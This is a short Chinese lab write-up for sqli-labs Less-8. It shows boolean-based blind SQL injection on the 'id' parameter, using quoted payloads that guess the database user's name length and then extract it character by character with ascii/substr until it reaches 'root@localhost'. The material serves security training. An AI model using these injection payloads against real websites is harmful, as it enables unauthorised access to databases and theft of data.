当前位置：Gxlcms > 数据库问题 > sqli-labs第八题

sqli-labs第八题

时间：2021-07-01 10:21:17 帮助过：48人阅读

技术图片

技术图片

1.注入单引号

技术图片

触发错误，页面为空。

技术图片

确认id参数为字符串型

2.注入布尔表达式

技术图片

技术图片

确认存在sql注入漏洞

3.利用布尔盲注，爆破用户名

查询用户名长度

?id=1‘ and (select length(user()))=14--+

使用二分法不断猜测长度值，直到页面返回正常

技术图片

得到用户名长度为14

通过比对ascii码，逐个字符爆破用户名

?id=1‘ and (select ascii(substr(user(),1,1)))=115--+

技术图片

技术图片

......直到14个字符爆破完毕，得到用户名为root@localhost

sqli-labs第八题

标签：cal sql注入 asc substr user sci 布尔表达式参数

人气教程排行